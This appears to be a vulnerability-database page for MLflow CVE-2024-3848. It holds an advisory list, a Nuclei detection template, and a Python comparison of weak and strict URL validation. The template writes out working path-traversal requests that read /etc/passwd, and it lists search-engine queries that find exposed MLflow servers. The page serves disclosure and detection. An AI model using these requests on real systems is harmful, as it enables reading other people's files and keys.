| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-3848 | 30 Nov 2024 13:48 | – | circl |
| Mlflow security vulnerability | 16 May 2024 00:00 | – | cnnvd |
| CVE-2024-3848 | 16 May 2024 09:03 | – | cve |
| CVE-2024-3848 Path Traversal Bypass in mlflow/mlflow | 16 May 2024 09:03 | – | cvelist |
| MLflow has a Local File Read/Path Traversal bypass | 16 May 2024 09:33 | – | github |
| CVE-2024-3848 | 16 May 2024 09:15 | – | nvd |
| BIT-MLFLOW-2024-3848 Path Traversal Bypass in mlflow/mlflow | 27 Jan 2025 07:13 | – | osv |
| GHSA-RFQQ-WQ6W-72JM MLflow has a Local File Read/Path Traversal bypass | 16 May 2024 09:33 | – | osv |
| PYSEC-2024-244 | 16 May 2024 09:15 | – | osv |
| PT-2024-28025 · Mlflow · Mlflow | 16 May 2024 00:00 | – | ptsecurity |
```yaml
id: CVE-2024-3848

info:
  name: Mlflow < 2.11.0 - Path Traversal
  author: gy741
  severity: high
  description: |
    A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal.
  impact: |
    Successful exploitation could lead to disclosure of sensitive information such as SSH keys or internal configurations.
  remediation: |
    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.12.1.
  reference:
    - https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3848
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-3848
    cwe-id: CWE-29
    epss-score: 0.43284
    epss-percentile: 0.98566
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln

variables:
  random: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "artifact_location": "http://host#/../../../../../../../../../../../../../../etc/"}
      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}
      - |
        POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
        Host: {{Hostname}}

        {{random}}
      - |
        POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}
      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_7
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_7
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4b0a0048304602210096fa367bacbdc7a45c3e63c4cfbbc3041e4c4eed3fa31a0f806ae586f78b47e7022100af022d4a496d71c1b542e6af6a5d756c0ae94e1bcb9a11299dc1d23c76f050de:922c64590222798bb761d5b6d8e72950
```
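The validation gap the description refers to can be seen with Python's standard URL parser. The following is an added example, not MLflow's code and not part of the template: a simplified path-only check next to a stricter one. The function names and the scheme allowlist are assumptions made for illustration.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https", "s3"}  # assumption: the deployment's own allowlist


def path_only_check(uri: str) -> bool:
    """Simplified 'before': looks for '..' only in the parsed path component."""
    return ".." not in urlsplit(uri).path.split("/")


def _fully_decoded(text: str, rounds: int = 5) -> str:
    """Percent-decode until stable so %252e%252e cannot hide a '..' segment."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def strict_check(uri: str) -> bool:
    """Hardened: also reject the URL parts a path-only check never inspects."""
    parts = urlsplit(uri)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    # An artifact location needs no fragment or query. Refuse the raw
    # characters so an empty fragment ("...#") is caught as well.
    if "#" in uri or "?" in uri:
        return False
    segments = _fully_decoded(parts.path).replace("\\", "/").split("/")
    return ".." not in segments


# Constructed inputs; the first is the artifact_location value from the template.
SAMPLES = [
    "http://host#/../../../../../../../../../../../../../../etc/",
    "s3://bucket/experiments/1",
    "http://host/a/%252e%252e/b",
    "http://host/artifacts#",
]


def audit(samples=SAMPLES):
    """Return (uri, path_only_result, strict_result) for each sample."""
    return [(s, path_only_check(s), strict_check(s)) for s in samples]


if __name__ == "__main__":
    for uri, before, after in audit():
        print(f"path-only={before!s:5} strict={after!s:5} {uri}")
```

For the template's value the parser returns an empty path and puts the whole traversal sequence in the fragment, so the path-only check accepts it while the strict check refuses it.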